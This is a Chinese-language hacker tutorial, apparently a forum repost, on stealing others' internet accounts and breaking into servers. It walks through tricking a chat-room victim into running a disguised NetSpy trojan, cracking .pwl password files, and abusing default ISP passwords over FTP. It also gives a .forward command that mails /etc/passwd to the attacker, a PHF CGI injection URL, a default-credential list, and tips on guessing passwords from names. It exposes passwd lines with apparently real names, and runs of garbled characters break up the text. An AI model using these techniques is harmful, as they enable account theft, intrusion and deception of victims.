如何得到別人的上網(wǎng)帳號(hào)和密碼

如何得到別人的上網(wǎng)帳號(hào)和密碼，我在這里介紹幾種弱智方法。
方案一：利用特洛伊木馬得到帳號(hào)。必備工具：NTESPY、PWLVIEW。
優(yōu)點(diǎn)：只要對(duì)方運(yùn)行了程序就有80%的成功率，而且不需要任何網(wǎng)絡(luò)入侵知識(shí)，只要能熟悉的操作上面兩個(gè)軟件即可。NETSPY是全中文軟件，一看就會(huì)。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車(chē)即可。成功率高，操作簡(jiǎn)單而且用不了多長(zhǎng)時(shí)間是它最大的優(yōu)點(diǎn)，只是......
7 u  g9 `- K4 P% z1 `0 `" N缺點(diǎn)：只有一個(gè)，那就是如何讓對(duì)方乖乖的運(yùn)行你的程序。
提示：先問(wèn)清你的目標(biāo)和你是不是在一個(gè)城市。
: ^4 |! f! V# L/ O& m7 z實(shí)戰(zhàn)演戲：一天，我在X海聊天室里尋找目標(biāo)，遇見(jiàn)了同在北京的色鵝丟丟。我上前打招呼：丟丟好呀。丟丟說(shuō)：你好呀。我又說(shuō)：XXXXXXX（客套話，先和他拉關(guān)系）對(duì)了，我拿到了一個(gè)新程序，要不要看看？丟丟說(shuō)：好呀，寄給我吧。
" Z7 I" p- _$ t% W$ S* @哈哈，魚(yú)上鉤了！先把誘餌程序改個(gè)名，如改成readme之類(lèi)的東東，然后和一些不相干的東西發(fā)過(guò)去，然后你讓他先運(yùn)行README。在這插一句，有一位大俠使用此法時(shí)，竟然把控制端程序和NETSPY的說(shuō)明文件一起發(fā)了過(guò)去，真搞不懂他怎么想的。我對(duì)他說(shuō)，你先運(yùn)行README，是中文說(shuō)明。丟丟說(shuō)：好...咦，怎么沒(méi)反映呀？(YEAH!)我又說(shuō)：那你直接運(yùn)行軟件吧。丟丟說(shuō)：好吧...不錯(cuò)...我說(shuō)：明天見(jiàn)...開(kāi)始干活，連上他的機(jī)子后，現(xiàn)在C盤(pán)里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98，進(jìn)入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過(guò)來(lái)，放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車(chē)，丟丟的上網(wǎng)帳號(hào)和密碼就都顯示出來(lái)了。而且以后如果他上網(wǎng)，NETSPY就會(huì)通知你，他就再也逃不出你的手掌心了。就算是他換了密碼，你也能在2分鐘內(nèi)再把他搞定。
忠告：你用他的帳號(hào)上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時(shí)間。分析一下他一般幾點(diǎn)上網(wǎng)以避免撞車(chē)。
方案二：利用ISP的疏忽做文章舉。例用工具：EMAILCRK或網(wǎng)絡(luò)刺客
優(yōu)點(diǎn)：沒(méi)什么優(yōu)點(diǎn)
缺點(diǎn)：要具體情況具體對(duì)待，太麻煩
提示：平時(shí)多多留神。
譬如，某個(gè)ISP給你開(kāi)好了帳號(hào)，然后又畫(huà)蛇添足的給你一個(gè)郵箱，地址是：你的帳號(hào)@xxx.net
: i) P  O7 h. D& l2 ]5 L密碼和你的上網(wǎng)密碼一樣。也就是說(shuō)，只要你能敲開(kāi)郵箱的密碼就一切OK了。
運(yùn)行EMAILCRK或網(wǎng)絡(luò)刺客，套上字典后就等著。一般沒(méi)有XX個(gè)小時(shí)搞不定，不成功的可能性很大，而且破解時(shí)還必須要上網(wǎng)。你的機(jī)子要是快可以開(kāi)上三四個(gè)窗口，套上不同的字典一起破
* Q7 _( q* }0 P# @4 k3 Q$ q6 D方案三：侵入郵局主機(jī)然后把PASS檔抓回來(lái)，然后用JOHN或JACK套上字典開(kāi)始破。
優(yōu)點(diǎn)：一次可以破出好多帳號(hào)，而且如果運(yùn)氣好還能拿到ROOT，這個(gè)主機(jī)就要?dú)w你控制了。而且破解時(shí)不用上網(wǎng)，可以好幾臺(tái)機(jī)子一起破。
) D2 @! A+ O( L; d缺點(diǎn)：對(duì)于初學(xué)者有一定困難，尤其是只想拿一個(gè)上網(wǎng)帳號(hào)這樣做恐怕會(huì)得不償失。而且被發(fā)現(xiàn)的可能性很大，情節(jié)嚴(yán)重且性質(zhì)惡劣，一定要慎重對(duì)待。
由于介紹此類(lèi)的教學(xué)文章比較多，我就不班門(mén)弄斧了。
0 J) K8 Z+ \% q) p( Q. M, b" |- G
哈哈，我來(lái)說(shuō)說(shuō)最簡(jiǎn)單的入侵方法。其實(shí)入侵大體的原理相同，主要是利用系統(tǒng)的漏洞（BUG）來(lái)做文章。
+ I% _" d8 @) C# C. r) x0 Z只不過(guò)有的網(wǎng)站漏洞難找有的好找而已。一個(gè)好的黑客，就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個(gè)小栗子。
# D7 m9 e+ x: e有一天，我去XX熱線申請(qǐng)主頁(yè)，發(fā)現(xiàn)那里采用的是機(jī)器自動(dòng)回信，信的大概格式如下：
" f, W: I4 s. T' q0 _
------------------------------

XXX，你好（XX是你在表格上填的名字）
你在XX熱線的主頁(yè)空間已開(kāi)通
帳戶名：XXX 密碼：11
-----------XX熱線
: v0 i4 }* G5 d4 }' w. [4 c- C% w電話：XXXX-XXXXXXXX
# i, x, ^, D6 b------------------------------
# d6 s9 l: h# k0 W, T
2 M5 J% X& g/ U" A' i1 ~好了，由于是機(jī)器回信，所以那里所有人的初始密碼都是11，而且該熱線要更改密碼要TELNET到郵局主機(jī)去改，有許多網(wǎng)友并沒(méi)有接觸過(guò)如何T主機(jī)，所以他們使用的還是初始密碼11。
3 B, E8 y: ?# a4 D+ ?6 V  O; X0 ^開(kāi)始干活了，打開(kāi)FTP軟件，輸入XX熱線的IP，密碼11，然后挨個(gè)輸入帳戶名。帳戶名可去XX熱線的主頁(yè)空間列表里查看，先試試AAAA，。。。沒(méi)成功，再換一個(gè)，AABB。。。還是不行。哈哈，這個(gè)用戶名短，沒(méi)準(zhǔn)能行。輸入AA。。。進(jìn)去了。寄下用戶名然后繼續(xù)試，ABC。。。又成功了，看來(lái)沒(méi)改密碼的人很多呀。試幾個(gè)就行了，現(xiàn)在，你已經(jīng)擁有這些帳戶的控制權(quán)了。
上面的這個(gè)栗子很簡(jiǎn)單，一般象這么大的漏很難找。要侵入一個(gè)稍微象點(diǎn)話的站臺(tái)就要耗費(fèi)你大量的時(shí)間和金錢(qián)，而且還未必能成功。即使成功了，你不改它實(shí)在無(wú)趣，改了恐怕會(huì)步馬X的后塵。此人侵入貴陽(yáng)的主機(jī)并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢(qián)了。所以我在這里勸大家一句，把這方面的精力放到全心全意為人民服務(wù)上去。實(shí)在不行就去聊天室，看誰(shuí)不聽(tīng)話就炸他，同樣很過(guò)癮的！
  
( X% _5 a- X: p9 G2 `
# o) N. Y+ J5 e6 e$ ?  d                           如何獲得第一個(gè)帳號(hào)
0 i4 x5 [$ P  y- f
& N& r  x0 I  \6 i: u" C/ Z' }我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個(gè)有效帳號(hào),進(jìn)入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無(wú)論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點(diǎn)找到對(duì)應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺(jué)最困難的是獲得第一個(gè)有效的帳號(hào),有時(shí)侯費(fèi)盡力氣也得不到,后來(lái)總算是積累了一些經(jīng)驗(yàn),想寫(xiě)出來(lái)和大家交流一下,希望能拋磚引玉,請(qǐng)高手們把更好的方法告訴我.

" J7 }' [- M0 s2 I確定了目標(biāo)以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開(kāi)匿名FTP,帳號(hào)用ANONYMOUS或是FTP,密碼用一個(gè)EMAIL帳號(hào)(當(dāng)然是假的),進(jìn)入后到/etc目錄下把PASSWD拿回來(lái),一般情況下都是一份很不全的名單,只有幾個(gè)系統(tǒng)帳號(hào),那就算白來(lái)了:-}但有的時(shí)候會(huì)有比較傻的管理員把一些普通帳號(hào)放進(jìn)去,這就是很重要的信息,雖然只有帳號(hào)沒(méi)有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x，做一個(gè).foward文件傳上去，在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后給匿名用戶寫(xiě)一封信，它會(huì)把PASSWD發(fā)給你。

# f! J4 t; o/ b) P如果目標(biāo)沒(méi)有匿名FTP,就通過(guò)WWW訪問(wèn)它的主頁(yè),看看上面有什么信息,例如通過(guò)一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號(hào),有的網(wǎng)頁(yè)上甚至列出了EMAIL通訊錄,這對(duì)黑客來(lái)講就是無(wú)價(jià)之寶.把這些帳號(hào)記下來(lái),非常有用.

7 Y' L$ H  `# G7 w以上幾個(gè)方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標(biāo)/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會(huì)顯示出PASSWD來(lái),但是成功率極低:-<

還可以利用目標(biāo)的FINGER功能來(lái)積累帳號(hào),如利用HAKTEK(一種掃描器)來(lái)監(jiān)視目標(biāo),一旦有人登陸該主機(jī)就會(huì)報(bào)告給你.但這種方法的缺點(diǎn)就是浪費(fèi)時(shí)間,如果你是自己花錢(qián)上網(wǎng)的話可就要出血了!
1 O% t- s  X/ F0 _7 J
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認(rèn)的帳號(hào),例如:
; u- ]  K  a6 a8 r: X
6 b8 f, T: \5 t. h帳號(hào)　　　　 密碼
----------- ----------------
root　　　　root
sys　　　 　sys/system/bin
1 A5 |* n1 F% l& abin　　　　 sys/bin
4 ]# ^7 O+ C  S. G( q/ |) Wmountfsys　 mountfsys
; T5 [8 E; K1 w5 v: cadm　　　　 adm
" p5 B# f6 E9 e  y, p7 ?+ @8 M* yuucp　　　　uucp
' A+ Y9 ?9 i, a8 U( r; ]nuucp　　　 anon
8 L2 g3 ], X! X" I7 B0 t5 s2 K6 Xanon　　　　anon
- H! Y, v) I  V( buser　　　　user
; B5 c4 U( e- Bgames　　　 games
install　　 install
reboot　　　給 "command login" 用的
demo　　　　demo
8 Y) G- ?/ h9 X3 `7 L. Wumountfsys　umountfsys
sync　　　　 sync
admin　　　 admin
7 \3 |4 Q8 Y! c! f0 J# Z# H' nguest　　　 guest
0 h: v( B& `* ]daemon　　　daemon
$ L0 B3 O) b- L" z3 N- x, T4 E& C________________________________________________________________

( M& w4 R2 X, m有些管理員忘記把他們改掉,那你就發(fā)財(cái)了!
$ o" Z, g$ L/ Y( x3 H
2 W! [: Q+ v( e6 w& y' y: j% a另外還有一些習(xí)慣性帳號(hào)如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.

只有帳號(hào)還不能進(jìn)入系統(tǒng),但有了帳號(hào)搞密碼就容易一些了,主要辦法還是猜.如果是通過(guò)PASSWD知道帳號(hào)的那你應(yīng)該會(huì)發(fā)現(xiàn)該用戶的許多信息,例如:

# l6 s* _+ f1 C8 n' b" g" Y0 N.........
. X8 e. k2 w/ w  Z3 a; }' I
( A- A% h' L! s  `3 d7 P( dxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
, [; @6 P7 b: Z! F; W0 X
" L1 A+ r* V: Nqingyuan:x:275:50::/usr/qingyuan:/bin/sh
0 V  r1 Q3 ]- P- h. P
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh

! N, D( H2 r9 |: t- ]" l  Bsmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
) X  a" u  M/ E3 n
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
; L% ?) M4 J% |( g  E! t, ]- [
0 [( X; ?# j- D  w- `7 cbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
8 \1 G; C4 |3 L$ P
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
8 L/ S( a8 O& W: z4 w
  @0 t* }( \$ F............

& x4 I2 h/ P8 P8 j+ w* k這是一部分PASSWD,從這兒我們可以得到七個(gè)帳號(hào),注意每一行的第五項(xiàng),那是該用戶的真實(shí)姓名,對(duì)!就用它來(lái)做密碼試.成功率還是比較高的.
. o5 t1 g) s* Y
) i3 F) L% S6 p2 E如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來(lái)獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來(lái)偵察support@xxx.xxx.xxx會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來(lái)猜">如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來(lái)獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來(lái)偵察support@xxx.xxx.xxx會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來(lái)猜.

4 n- C, B4 ]7 J. M0 `" [當(dāng)然最可能的密碼還是帳號(hào)本身和一些帳號(hào)的變形,如帳號(hào)是john,密碼可能是nhoj,john123,john888等.或是一些簡(jiǎn)單數(shù)字.總之是要費(fèi)一番工夫來(lái)猜的.

如果還猜不出密碼,只好用LETMEIN之類(lèi)的東西來(lái)猜,字典一定要好.否則,你的電話費(fèi)就要.....而且這種方法比較危險(xiǎn),還是不用為好.
& j4 K& V6 n5 a: t8 z# m
( f8 X- j9 j# b8 s1 t最后實(shí)在不行還有一種比較卑劣的手段，就是給該網(wǎng)站的網(wǎng)管寫(xiě)封信，想辦法騙他執(zhí)行特洛伊木馬，然后再.......算了,不說(shuō)了.
9 H5 J5 ?- P6 k$ l! H; z
0 `/ M1 r9 @6 v1 w- [你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說(shuō)成功率是比較低的,因?yàn)槲乙膊恢栏玫姆椒?但我感到一定有一種更好的方法,希望有高手見(jiàn)到此文能告訴我.